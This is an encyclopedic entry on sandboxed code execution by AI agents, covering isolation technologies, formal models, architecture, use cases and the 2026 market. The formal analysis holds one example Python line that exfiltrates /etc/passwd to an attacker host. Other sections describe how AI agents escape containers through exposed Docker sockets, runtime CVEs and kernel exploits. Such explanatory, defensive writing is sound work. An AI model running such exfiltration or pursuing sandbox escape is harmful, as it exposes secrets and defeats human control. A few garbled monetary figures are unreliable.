Code execution, in the context of AI agents, is the capability whereby a model generates source code and runs it in a sandboxed interpreter or runtime, then incorporates the results into its reasoning. It transforms a language model from a text generator into a tool-using agent that can compute, manipulate data, call APIs, and verify outputs programmatically. It matters because executable tool use grounds agent behaviour in deterministic computation and extends capabilities beyond what next-token prediction alone can achieve.
Semantic Classification
Content
Compositional Relationships (Components)
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:SandboxedRuntime))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:ShellEnvironment))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:OutputParser))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:ResourceGovernor))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:ExecutionTimeoutController))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:FilesystemIsolationLayer))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:hasPart ai:NetworkEgressFilter))
Dependency Relationships
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:requires ai:SandboxEnvironment))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:requires ai:LargeLanguageModel))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:requires ai:FunctionCalling))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:requires ai:ToolSchema))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:dependsOn ai:CodeGeneration))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:dependsOn ai:PromptEngineering))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:dependsOn ai:StateManagement))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:dependsOn ai:Orchestration))
Capability Relationships
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:AgenticWorkflow))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:AutonomousDebugging))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:AutomatedTesting))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:DataAnalysis))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:SelfCorrectingAgent))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:RepositoryScaleRefactoring))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:enables ai:CICDAutomation))
Implementation Relationships
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:implements ai:CodeActActionSpace))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:implements ai:ReActReasoningPattern))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:uses ai:FirecrackerMicroVM))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:uses ai:DockerContainerisation))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:uses ai:gVisorUserSpaceKernel))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:uses ai:PythonREPL))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:uses ai:BashShell))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:uses ai:ModelContextProtocol))
Reduction Relationships
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:reduces ai:HallucinatedComputationalOutput))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:reduces ai:ManualTestingEffort))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:reduces ai:DebugCycleLatency))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:reduces ai:HumanInterventionRequirement))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:reduces ai:ArithmeticHallucinationRate))
SubClassOf(ai:CodeExecution
ObjectSomeValuesFrom(ai:reduces ai:BugRegressionRate))
About
Code Execution as an AI agent capability has its conceptual roots in the classical computer science notion of a REPL (Read-Eval-Print Loop), popularised by Lisp environments in the 1960s and formalised by John McCarthy’s interactive Lisp interpreter at MIT. The REPL paradigm — read an expression, evaluate it in the current environment, print the result, loop — prefigures the agent observe-act cycle exactly: the agent reads a task or observation, generates an executable expression (code), evaluates it in the sandbox, and observes the printed output to inform the next step. The modern AI-agent form of this pattern emerged from two converging research streams: tool-use in Reinforcement Learning (where agents were given access to calculators, lookup tables, or search engines as callable tools, from DQN’s atari game score accumulation through WebGPT’s browser interface) and neural Code Generation (which raised the question of what to do with generated code beyond inspecting it as text output). The watershed public moment came in 2022-2023 when OpenAI’s code-interpreter plugin for ChatGPT demonstrated to millions of practitioners that an LLM Agents could write Python to solve a user’s data analysis or visualisation problem and actually run it, returning a matplotlib figure or a computed numerical result rather than merely prose describing how one might hypothetically compute such a result. This demonstration collapsed the conceptual barrier between generation and execution in mainstream AI tooling, triggering a rapid shift in framework design from function-call vocabularies toward code-as-action.
The defining theoretical contribution came from the CodeAct paper (Wang et al., 2024, accepted at ICLR 2025), which rigorously formalised the choice of Python code as the universal action space for agentic AI systems and provided empirical evidence of its superiority over structured JSON Function Calling schemas on 17 diverse agent benchmarks. The argument rests on four properties of Python as an action space: Turing-completeness (any computation expressible as JSON function-call chains is expressible as Python, but not vice versa); composability (Python functions, objects, and control flow enable multi-step behaviours within a single action step); self-documentation (Python variable names and docstrings provide interpretable traces for debugging and oversight); and library coverage (Python’s package ecosystem covers every domain a code-executing agent might encounter, from scientific computing via numpy/scipy to web scraping via requests/beautifulsoup to machine learning via torch/transformers). The theoretical consequence is that CodeAct’s action space subsumes all prior fixed-vocabulary tool-use frameworks while strictly extending them. OpenHands, the open-source software agent framework built on CodeAct’s action space by All Hands AI (Princeton Language and Intelligence Lab spin-out, $18.8M Series A), validated this claim at production benchmark scale: achieving SWE-bench Verified scores of 53%+ with standard models and exceeding 72% with Claude Sonnet 4.5 extended thinking, OpenHands established sandboxed code execution as the primary substrate through which autonomous agents interact with, modify, and verify software systems at repository scale.
Isolation technology is the critical engineering layer beneath agent code execution, determining the security guarantees, performance characteristics, and operational costs of any code-execution deployment. Three dominant isolation paradigms have crystallised by 2026. First, hardware-virtualisation microVMs using Firecracker (AWS-developed, open-source, adopted by the Linux Foundation): each workload gets its own kernel running on hardware-virtualisation support (KVM), so a kernel exploit inside one VM cannot escape to the host or adjacent VMs. Firecracker boots in approximately 125ms with approximately 5MB memory overhead and near-zero attack surface, making it the current gold standard for high-assurance untrusted code execution — used by E2B, AWS Lambda, and Vercel Sandbox. Second, user-space kernel interposition via gVisor (Google, open-source Go implementation): a user-space process intercepts and re-implements every syscall from the containerised workload so the sandboxed program never communicates with the real host kernel. gVisor provides stronger isolation than standard Docker alone without full hypervisor overhead and kernel duplication — adopted by Google Agent Sandbox on Google Kubernetes Engine (GKE) and Modal. Third, restricted-interpreter sandboxing, where a Python REPL or JavaScript runtime is launched within a minimal environment with an allow-list of permitted standard library modules, blocking network access, filesystem write access, and subprocess spawning — appropriate for lower-threat contexts such as mathematical computation, string processing, or data transformation where the range of executable operations is tightly constrained. The choice between these strategies involves multi-dimensional trade-offs between isolation strength, cold-start latency, runtime capability breadth, GPU availability, persistence semantics, and per-execution cost. No single isolation primitive is universally optimal: Firecracker maximises security at modest latency cost; gVisor balances isolation and performance for general workloads; restricted interpreters minimise overhead but limit capability. Production multi-agent systems such as CLI Multi-Agent Systems deployments increasingly mix isolation tiers — using Firecracker for untrusted user-submitted code and lighter Docker containerisation for trusted internal agent actions — to balance security and performance dynamically.
The broader ecosystem impact of code execution as a first-class AI capability extends well beyond software engineering. In data science, code execution grounds LLM-generated statistical analyses in actual computation, eliminating the arithmetic hallucination pathology that plagued purely-textual model outputs on numerical tasks. In scientific research, AI agents use code execution to run simulations, process experimental datasets, fit statistical models, and generate publication-ready visualisations — workflows piloted by Edinburgh’s Agentic AI for Scientific Discovery programme and several pharmaceutical R&D pipelines as of 2026. In cybersecurity, code-executing agents can dynamically construct and run proof-of-concept exploits in sandboxed environments to validate vulnerability severity assessments, a capability being developed by UCL’s Information Security group with Google funding. In mathematical reasoning, frontier models paired with Python execution via SymPy and SageMath reduce arithmetic and algebraic hallucination rates by orders of magnitude compared to pure-language-model computation, grounding mathematical conclusions in verified symbolic computation rather than pattern-matched text.
Formal Analysis
A rigorous formal model of agent code execution can be expressed as a labelled transition system over a product of agent-state and execution-environment-state. Let A be an AI agent with internal state s_A (including the context window containing the task description, prior observations, and generated code history), and let E be an execution environment with state s_E (the filesystem, process table, environment variables, network state, and package installation state of the sandbox). The joint state is (s_A, s_E) ∈ S_A × S_E, and the code execution cycle defines a set of transitions on this product space.
The generation step is a (partial) function gen: S_A → T* where T* is the set of all finite token sequences over the model vocabulary. In practice, gen is stochastic — parameterised by the model weights θ — producing a distribution over token sequences: P(t₁, t₂, …, t_n | s_A; θ). The execution step is a deterministic (or near-deterministic) function exec: T* × S_E → Observation × S_E’, where Observation = (stdout: String, stderr: String, exit_code: Int, files: Map[Path, Bytes], wall_time: Float, peak_mem: Int) and S_E’ is the updated environment state after execution. The observation is then appended to the agent’s context, yielding an updated state s_A’ = s_A ++ [Observation], and the cycle repeats.
This formalism reveals the central theoretical property of code execution as a grounding mechanism: the exec function is a syntactic semantics map in the sense of Plotkin’s Structural Operational Semantics (SOS) — it gives the precise meaning of each code text by mapping it to its computational effect on environment state. The language model gen is therefore a distribution over SOS-interpretable strings, and the composition exec ∘ gen defines a stochastic operational semantics for the agent’s action policy. The critical safety question — can an agent’s executed code escape its sandbox? — is precisely the question of whether the transition rules of exec can produce states in S_E \ S_safe, where S_safe ⊆ S_E is the set of admissible environment states enforced by the isolation layer (microVM isolation, gVisor syscall interception, or namespace confinement).
The UK AI Security Institute formalised this concern empirically in its SandboxEscapeBench evaluation (March 2026), which introduced 18 sandbox escape scenarios spanning three layers of the container stack: orchestration-level misconfigurations (exposed Docker sockets, privileged container flags), runtime-level vulnerabilities (container runtime CVEs exploitable by code running inside), and kernel-level privilege escalation chains (kernel exploits accessible within the namespace confinement model). Implemented as capture-the-flag-style challenges using AISI’s open-source Inspect evaluation framework, SandboxEscapeBench demonstrated that when known vulnerabilities are present in the sandbox stack, capable frontier LLMs can identify and systematically exploit them — confirming that sandbox implementation quality is a critical safety variable, not merely an operational concern. The benchmark is now the reference evaluation standard for sandbox security assessment in UK government-procured AI Agent Systems.
The information-theoretic perspective on code execution complements the operational semantics view. From an information theory standpoint, the generation step is a lossy compression of the agent’s intended computation: the code produced is a finite string that must implicitly represent the agent’s computational intent within the syntax and semantics of the target programming language. The execution step is an information expansion: the interpreter or runtime unpacks the compressed string representation into a full computational process that may produce megabytes of output, modify gigabytes of filesystem state, and consume billions of CPU cycles — far exceeding the entropy of the submitted code string itself. This asymmetry between code length and execution effect is what makes sandboxing essential: a short code string representing import subprocess; subprocess.run(["curl", "-X", "POST", "attacker.com/exfil", "--data", "@/etc/passwd"]) has small syntactic entropy but potentially catastrophic semantic consequence if the execution environment is unrestricted.
Formal containment proofs for sandboxed execution environments rely on the confinement property: for any code string c and environment state s_E, exec(c, s_E) ∈ S_safe. This property is straightforwardly falsifiable for any concrete sandbox implementation via vulnerability analysis and penetration testing — the approach taken by SandboxEscapeBench. Constructive proofs of confinement for specific implementations are harder: Firecracker’s confinement guarantee relies on the correctness of Linux KVM (hardware hypervisor), the correctness of the Firecracker VMM codebase (approximately 50,000 lines of Rust with strong memory-safety guarantees from the type system), and the correctness of the host Linux kernel’s KVM interface — any of which could, in principle, contain exploitable bugs. gVisor’s confinement guarantee relies on the correctness of its Go-language user-space kernel implementation (approximately 150,000 lines) and the absence of exploitable kernel bugs in the (reduced, controlled) set of host syscalls that gVisor itself makes. Both isolation primitives reduce the trusted computing base (TCB) compared to unrestricted execution, but neither provides a mechanised proof of confinement, making empirical evaluation benchmarks like SandboxEscapeBench a necessary complement to design-time isolation reasoning.
The complexity class perspective illuminates the worst-case limitations of code execution containment. The halting problem — whether a given program will terminate — is undecidable in general (Turing, 1936), which immediately implies that no sandbox can completely prevent infinite loops without time limits. The execution timeout mechanism (enforcing a maximum wall-clock duration T_max) converts the infinite execution problem into a bounded one: any program that does not terminate within T_max is forcibly killed, and the resulting TimeoutError observation is returned to the agent. This converts an undecidable termination check into a decidable resource-bounded execution, at the cost of potentially terminating legitimately long-running computations before they complete. The design of T_max values is therefore a principled engineering trade-off between computational expressiveness (higher T_max allows longer computations) and resource consumption and liveness (lower T_max ensures timely agent step completion and predictable cost). Production systems typically implement tiered timeout policies: 30 seconds for interactive debugging steps, 5 minutes for test suite execution, and up to 1 hour for explicitly flagged long-running scientific computations.
Components / Architecture
A production code execution pipeline for an AI agent comprises the following tightly interlocked components, each addressing a distinct engineering concern:
Code Generation Layer: The Large Language Models receives a task description, current sandbox state summary, previous execution trace history, and available tool descriptions through its Prompt Engineering context window. It generates executable code — most commonly Python for data manipulation, testing, and library usage; Bash for filesystem operations, git commands, and process management; or SQL for database queries. The generation quality directly determines execution success: poorly-specified code generates unhelpful error outputs that consume context window and execution budget without progress. Modern systems include execution-history compression techniques to fit many prior observations within finite context windows.
Sandbox Orchestrator: A control-plane service managing the full lifecycle of isolated execution environments: provisioning a new sandbox per session or per invocation, routing code submissions to the appropriate runtime, enforcing timeout budgets across multiple execution steps, capturing and structuring outputs, and tearing down or warming sandboxes to balance performance and cost. In persistent-session products (E2B, Daytona) the sandbox remains warm between agent actions, preserving filesystem state and installed packages; in serverless products (Vercel Sandbox, AWS Lambda Firecracker) it cold-starts per invocation, trading latency for isolation and cost predictability.
Isolation Runtime: The core security primitive — Firecracker microVM, Docker container with seccomp profile, gVisor sandboxed container, or restricted interpreter process. Responsibilities: filesystem namespace isolation (separate mount namespaces per execution, ephemeral or persistent depending on session type), network egress filtering (allow-list of approved external endpoints, or full block for maximum isolation), CPU/memory resource limits via Linux cgroups, and process-tree containment preventing fork bombs or spawned daemon processes from outliving the execution step.
Output Capture and Structured Parser: Captures the full execution trace — stdout stream, stderr stream, exception tracebacks, exit code integer, wall-clock execution time, peak memory usage, and any files written to a designated output directory. Transforms these multi-stream captures into a structured result object (typically JSON-serialised) suitable for direct injection into the Large Language Models’s next context window as an observation. Truncation policies handle stdout exceeding context window limits (typically 128K-1M tokens), extracting error messages, final lines, and structured summary patterns preferentially.
Resource Governor: A policy enforcement layer that applies per-execution resource limits: execution wall-clock timeouts (typically 30-300 seconds for normal tasks, up to 1 hour for long-running scientific computations), memory caps (typically 512 MB - 8 GB per step), CPU quota (number of vCPUs or CPU-shares), network rate limiting, and storage quota for the writable layer. Kills execution processes that exceed limits and returns a structured timeout/OOM error to the agent for self-correction.
State Manager and Persistent Filesystem: Provides a consistent virtual filesystem persisted across multiple execution steps within a single agent session. The agent reads project files, writes patch files, runs tests that produce output files, and reads those output files across a sequence of 10-50 code execution steps — filesystem state is the primary working memory for multi-step coding tasks. Implemented via bind-mounted host volumes (simplest, lowest overhead), copy-on-write overlay filesystems (for efficient snapshot/restore between agent sub-tasks), or distributed file storage systems (for multi-agent collaborative access to shared state). The Git version control system is frequently used as a structured state-management layer, with agents committing patches and reading diffs to track incremental progress.
Tool Schema Registry and Model Context Protocol Integration: Declares the code execution capability as a typed tool in Model Context Protocol format — specifying the tool name, parameter schema (typically accepting a single code: string field plus optional language: string, timeout: int), and return schema (stdout, stderr, exit code, files). Any Large Language Models implementing the MCP tool-call protocol can invoke code execution through this standard interface, enabling code execution to compose with other MCP tools (web search, file editing, database query) within a single agent step.
Observability and Telemetry Layer: Spans execution traces — per-step latency, resource consumption, exit codes, token usage — via OpenTelemetry traces exported to monitoring backends for debugging, cost attribution, and security audit in multi-agent pipelines. Essential for production CLI Multi-Agent Systems that execute thousands of code steps per day, enabling identification of slow execution paths, runaway processes, and anomalous network access patterns indicative of prompt injection or sandbox escape attempts.
Use Cases
Software Engineering Agents (primary deployment): The dominant production use case for agent code execution. The agent receives a natural language issue description referencing a specific GitHub repository, uses code execution to: (1) read and understand repository structure via ls, cat, grep commands; (2) run the existing test suite to establish baseline behaviour; (3) write a code patch targeting the issue; (4) run tests again to verify the patch resolves the failure without introducing regressions; (5) iterate on the patch if tests fail, using error output from execution to diagnose mismatches. SWE-agent (Princeton, NeurIPS 2024) and OpenHands demonstrated this complete workflow at repository scale with real open-source Python projects. By 2026, commercial systems including Claude Code, GitHub Copilot Agent Mode, and Devin (Cognition AI) perform this workflow against real enterprise codebases, with State Management and Git integration enabling multi-session tasks spanning hundreds of execution steps and file edits.
Data Analysis and Scientific Computing: LLM-driven data analysis tools (Code Interpreter in ChatGPT Plus, Claude’s tool use, Gemini Advanced) enable non-programming domain experts to analyse CSV files, generate statistical summaries, fit regression models, perform time-series analysis, and produce publication-ready visualisations by describing the analysis in natural language and receiving Python code that is immediately executed in a sandboxed Python environment with pandas, numpy, scipy, matplotlib, and seaborn pre-installed. The execution results — numerical output, rendered plot images, structured tables — are returned directly in the conversation. This is the most widely adopted consumer-facing form of agent code execution, with tens of millions of users globally by 2025.
Automated Test Generation and Execution: Agents write unit tests from function signatures, docstrings, or natural language descriptions of expected behaviour; execute the tests; parse failure messages; diagnose root causes; and iterate until a target coverage metric is met or all edge cases are addressed. Integrated into CI-CD Automation pipelines via GitHub Actions or similar, this enables continuous test generation alongside code changes without manual test-writing effort. Tools like Cover-Agent and CodiumAI’s PR-Agent embed this workflow directly into pull request review processes.
Security Research and Penetration Testing: UCL’s Professor Arthur Gervais and the Information Security group received Google funding in 2026 specifically to develop AI agents that generate and execute proof-of-concept security exploits in fully isolated sandboxes — moving from static SAST tool warnings (which indicate potential vulnerabilities) to validated, actionable vulnerability demonstrations (which confirm exploitability). The extreme isolation requirements for this use case (full network block, no persistent state, kernel-level microVM isolation) illustrate the security-criticality of proper sandboxing. Similar exploit-development agent capabilities are in development at Microsoft Security Research and DARPA’s AI Cyber Challenge (AIxCC) programme.
Mathematical and Scientific Reasoning: Frontier model providers (Anthropic, OpenAI, Google) have deployed code execution as a grounding mechanism for mathematical problem-solving. Rather than performing arithmetic, algebra, or calculus in natural language — where hallucination rates on multi-step computations can reach 40-70% — the model writes and runs SymPy symbolic computation, SageMath, or numerical solvers in an executed Python environment, returning verified results. This approach has been shown to reduce mathematical reasoning errors by orders of magnitude on tasks requiring exact numerical or symbolic answers, and is a key mechanism behind frontier model performance on olympiad-level mathematics benchmarks (AMC, AIME, IMO).
Infrastructure Automation and Validation: Agents execute Terraform plan, Ansible dry-run, or kubectl apply --dry-run in sandboxed cloud environments to validate Infrastructure as Code changes before applying them to production — providing a safe staging layer for AI-driven infrastructure management. The agent can iterate on Terraform configurations, execute terraform plan to observe proposed changes, and revise the configuration to achieve the desired infrastructure state, all within a sandboxed environment with read-only access to real cloud APIs for planning and preview.
Multi-Modal Analysis: Code-executing agents parse binary file formats (images via PIL, PDFs via PyMuPDF, audio via librosa, video via cv2), extract structured data, run analysis pipelines, and return rich output — enabling LLM Agents to reason about non-text data modalities by converting them to structured representations amenable to language model reasoning. This is an emerging capability bridging code execution with multi-modal AI systems.
Academic Context
Code execution as an AI agent capability sits at the intersection of four research traditions: operational semantics and formal methods (providing the theoretical grounding for what execution means), the tool-use literature in Reinforcement Learning (providing the first empirical evidence that external computation could augment neural model capabilities), the Code Generation community (which produced the code-writing models that make agent code execution possible), and the multi-agent systems research tradition (which developed the orchestration and planning layers that coordinate sequences of execution steps).
The foundational theoretical work comes from operational semantics: Plotkin’s Structural Operational Semantics (1981) provided a mathematical framework for defining the meaning of program execution as a sequence of state transitions, independent of any particular implementation. Wright and Felleisen’s syntactic approach to type soundness (1994) established how execution semantics relates to the type system of a language, grounding safety proofs for programming language execution. These theoretical foundations underpin the security reasoning applied to agent sandbox design — the question of whether code execution can escape a sandbox is, at a theoretical level, a question about the operational semantics of the execution environment and whether its transition rules can produce states outside the intended confinement boundary.
The tool-use research trajectory began in Reinforcement Learning with agents given discrete, bounded tool actions (calculator invocation, database lookup, search engine query) as atomic extensions to their policy action space. Nakano et al.’s WebGPT (2021) demonstrated that an LLM could be trained via Reinforcement Learning from Human Feedback to use a web browser as a tool, substantially outperforming base-model performance on fact-intensive question answering. Gao et al.’s PAL (Program-Aided Language Models, 2022) and Chen et al.’s Program-of-Thoughts (2022) showed that interleaving Python code generation with natural language reasoning dramatically improved mathematical and algorithmic problem-solving by offloading computation to an executed interpreter. The decisive synthesis was Yao et al.’s ReAct (2022), which established a general interleaved Reasoning-Acting framework where agents alternate between generating natural language reasoning traces (think) and taking executable tool actions (act), observing the outputs and incorporating them into subsequent reasoning steps — the precise pattern that defines modern code-executing agents.
The CodeAct paper (Wang et al., 2024) provided the decisive theoretical and empirical argument for Python code as the universal tool-action interface, superseding prior frameworks’ fixed JSON function-call schemas by demonstrating Python’s strictly greater expressiveness and practical superiority on 17 diverse agent evaluation tasks. OpenHands (Wang et al., ICLR 2025) provided the definitive open-source platform for software engineering agent research built on CodeAct principles, enabling reproducible comparison of different LLMs, prompting strategies, and sandbox configurations on SWE-bench. The SWE-agent paper (Yang et al., NeurIPS 2024) introduced the Agent-Computer Interface (ACI) concept — a principled design framework for the command interface through which an agent interacts with the execution environment, showing that interface design choices (command set, output format, error message design) substantially impact agent performance independent of the underlying LLM.
Key research groups as of 2026: All Hands AI and Princeton Language and Intelligence Lab (OpenHands, SWE-agent, SWE-bench); Stanford Centre for Research on Foundation Models (CRFM — tool-use benchmarking and evaluation); UCL Information Security group (Professor Arthur Gervais — exploit-generation agents); University of Edinburgh School of Informatics (agentic AI for scientific discovery; code execution for materials and chemistry research); MIT CSAIL (program synthesis and verified code execution intersection); Carnegie Mellon University CAIRO Lab (agent planning and execution); Anthropic Alignment Science team (safe code execution policies and sandboxing standards); Amazon Web Services Research (Firecracker development and serverless compute isolation).
Current Landscape (2026)
As of mid-2026, sandboxed code execution has become a standard, expected, and frequently invisible infrastructure capability in all major agentic AI frameworks, commercial software engineering products, and frontier model deployments. The capability has completed its transition from a research novelty (2022-2023: ChatGPT Code Interpreter, pioneering demonstrations) through rapid productisation (2024: E2B, Modal launch; CodeAct publication; OpenHands ICLR 2025 acceptance) to infrastructure commoditisation (2025-2026: managed execution APIs proliferate, Model Context Protocol standardises tool schemas, and execution becomes a taken-for-granted component of any agentic software system).
The competitive landscape as of mid-2026 is defined by three distinct tiers serving different buyer types:
Managed Execution APIs (infrastructure tier): These products sell sandboxed code execution as a metered cloud service consumed by framework and application builders. Key players: E2B (Firecracker-backed, AI-first Python/JavaScript SDK with prebuilt environment templates for common agent use cases, 24-hour persistent session limit, GPU support available via E2B GPU tier); Modal (gVisor-backed, GPU-native, serverless scale-to-zero, strong Python scientific computing support with CUDA); Vercel Sandbox (edge-deployed, sub-100ms cold start, optimised for web application testing agents); Daytona (developer-environment-focused, integrates with Git workflows, configurable via devcontainer spec); Spheron Network (NVIDIA GPU sandboxes accessible to code-executing agents for ML training and inference tasks within agent pipelines). Market dynamics: commoditisation of cold-start performance (all major providers now below 200ms), GPU availability becoming a primary differentiator, and session pricing models shifting from per-invocation to per-active-minute as persistent agents become the dominant pattern.
Agent Framework Integrations (orchestration tier): Major multi-agent frameworks provide first-class code execution tool integrations as standard components. OpenHands implements CodeAct on Docker sandboxes with a rich tool interface including web browsing, file editing, and shell access. AutoGen (Microsoft, v0.4 actor-model architecture) provides Python executor, shell executor, and Jupyter notebook executor as swappable components in its execution pipeline. LangGraph (LangChain, graph-state orchestration) integrates code execution via MCP tool nodes or native PythonREPLTool, with persistence managed through PostgreSQL-backed state checkpointing. CrewAI provides code execution as a built-in agent tool with role-scoped access control. Model Context Protocol (Anthropic, November 2024; 8 million monthly SDK downloads by April 2025; adopted by OpenAI, Google, Microsoft) defines the standard JSON schema for declaring and invoking code execution capabilities, enabling any MCP-compatible agent to discover and use any MCP-compatible execution sandbox without bespoke integration.
End-to-End Agent Products (application tier): These products embed code execution as an internal implementation detail within a complete software engineering automation experience. Claude Code (Anthropic, terminal-first, launched 2024) achieved 72.7% on SWE-bench Verified with Claude Sonnet 4 and 80.8% with Claude Opus 4.6, with provisional Claude Mythos scores of 93.9%. GitHub Copilot Agent Mode (Microsoft) achieved 72.5% on SWE-bench Verified by Q1 2026. Devin (Cognition AI, $2.1 billion valuation, 2024) provides a web-accessible software engineering agent interface backed by a persistent virtual development environment with code execution. OpenHands Cloud provides the open-source agent as a fully managed service.
Performance trajectory on SWE-bench Verified is the clearest signal of code execution quality improvement: 13% (early 2023 baselines) → 30% (late 2023, GPT-4 with basic code execution) → 53% (OpenHands, early 2025) → 72%+ (OpenHands + Claude Sonnet 4.5 extended thinking, mid-2025) → 80.8% (Claude Code + Opus 4.6, early 2026) → 93.9% (Claude Mythos, provisional, 2026). These performance gains are not attributable solely to model capability improvements; a substantial fraction derives from improvements in code execution loop quality — more reliable error parsing, better multi-step state management, more effective iteration strategies when tests fail.
The GPU-in-sandbox problem was partially resolved in 2025-2026. Prior to this, code-executing agents were limited to CPU-only sandboxes, preventing ML model training, GPU-accelerated numerical computation, and CUDA-based scientific simulation from being incorporated into agent pipelines. Modal and Spheron Network now offer NVIDIA A100 and H100 GPU-accessible sandboxed runtimes with CUDA 12.x support, enabling agents to run torch.compile, cuDNN operations, and GPU-accelerated molecular simulation within isolated execution steps. This extends code execution’s reach into scientific AI applications where GPU compute is a prerequisite.
Security incidents and sandboxing standards: As code-executing agents became widespread in 2025, the first documented sandbox escape attempts by adversarially crafted code prompts emerged. The OWASP Top 10 for LLM Applications (2025 edition) formally classifies Insecure Sandbox Execution as a high-severity risk category. The UK AI Safety Institute’s guidance on frontier AI agents (2025) establishes minimum sandboxing requirements for government-procured AI systems, while the EU AI Act (fully effective August 2026) requires conformance attestations for AI systems that autonomously execute code in critical infrastructure contexts.
AISI SandboxEscapeBench (2026) — a landmark security evaluation: The UK AI Security Institute published SandboxEscapeBench in March 2026, the first systematic benchmark for measuring whether frontier AI agents can break out of their execution containers. The benchmark introduces 18 escape scenarios across three layers of the container stack — orchestration (exposed Docker sockets, privileged flags), runtime (container runtime CVEs), and kernel (privilege escalation chains) — implemented as capture-the-flag challenges within AISI’s open-source Inspect evaluation framework. The key finding: when known vulnerabilities are present in the sandbox stack, frontier LLMs can reliably identify and exploit them, demonstrating that sandbox security properties cannot be assumed from design intent alone but must be continuously evaluated empirically. A companion “Inspect Sandboxing Toolkit” provides a production-ready plugin framework for safely running AI agent evaluations within nested sandboxed environments, adopted by multiple UK government AI evaluation programmes. These AISI contributions set the global standard for empirical sandbox security assessment and directly informed the UK government’s approach to sandboxing requirements in its AI procurement framework.
Market scale and infrastructure investment (2026): AI coding tools — the primary deployment context for code execution infrastructure — generated 5.1 billion recorded in 2024. E2B closed a 24 million Series A in February 2026, led by FirstMark Capital, positioning itself as the compliance-first enterprise sandbox with explicit HIPAA, SOC 2, and GDPR conformance coverage and support for Kata Containers hardware-level isolation for regulated industries. These funding events confirm that sandboxed code execution infrastructure has transitioned from a research project to a venture-capital-validated product category with substantial enterprise revenue, independent of the AI application layer products built on top of it.
Isolation technology differentiation (2026): The competitive landscape of execution isolation primitives has clarified. E2B’s Firecracker microVM approach — each sandbox in its own kernel via Linux KVM, defended in depth by the Firecracker jailer process that drops privileges and applies cgroups/namespaces before any VMM initialisation — remains the highest-assurance general-purpose option. Modal’s gVisor approach provides a differentiated position for workloads requiring tight platform integration and GPU access, where the overhead of a full microVM kernel would be prohibitive and gVisor’s user-space kernel interposition provides sufficient security for the threat model. Daytona’s layered approach (Docker default, Kata Containers optional) targets enterprise compliance requirements where the compliance documentation trail matters as much as the technical isolation guarantee. The fourth tier — restricted-interpreter sandboxing for lower-threat mathematical and data processing tasks — remains viable for controlled use cases. Northflank’s 2026 comparative analysis of E2B vs Modal found that E2B leads for pure untrusted code execution security, Modal for GPU-native scientific workloads, and Daytona for regulated enterprise environments — confirming multi-tier specialisation rather than a single dominant architecture.
UK Context
The UK has developed significant and multidimensional capability in the infrastructure, research, regulation, and industrial deployment of AI agent code execution. The following key developments characterise the UK landscape as of 2026:
UCL (University College London) — Security-Focused Code Execution Research: Professor Arthur Gervais and the UCL Information Security research group received Google funding in early 2026 specifically for research into AI agents that generate and execute proof-of-concept security exploits in tightly controlled sandboxed environments. The research programme targets the gap between static application security testing (SAST) tools — which flag potential vulnerabilities without confirming exploitability — and validated exploit confirmation, a task currently requiring expert human penetration testers and bottlenecking enterprise security response. UCL’s code-executing security agents must operate under the most stringent isolation requirements of any production code execution application (full network block, ephemeral-only execution, Firecracker microVM isolation, no persistent state), making the programme a leading-edge test case for sandboxing technology. UCL also leads the UKRI-funded national generative AI research hub, a multi-institution consortium including Imperial College London, Cambridge, Oxford, Manchester, Edinburgh, and Surrey, with industry partners including IBM, BT, DeepMind, and Cisco Systems — providing coordinated national research infrastructure for AI agent code execution research.
University of Edinburgh School of Informatics: Ranked #1 in the UK for Natural Language Processing research and a top-5 global AI research centre, Edinburgh’s Informatics group has developed an Agentic AI for Scientific Discovery programme that uses code execution as the primary substrate for automated scientific hypothesis testing. In materials science and computational chemistry applications, AI agents propose hypotheses (e.g., predicted molecular binding energies or crystal structure properties), write and execute density functional theory (DFT) calculation scripts using established quantum chemistry packages (ORCA, VASP, Gaussian), parse the numerical outputs, update their hypothesis models, and propose refined hypotheses — a complete automated scientific reasoning loop grounded in actual computational physics rather than language model recall. CodeClan (Edinburgh) launched what is thought to be the UK’s first applied agentic AI programme for senior software engineers in 2025, with code execution agent architecture as a core curriculum component taught through hands-on exercises building agents with OpenHands and Model Context Protocol tool integrations.
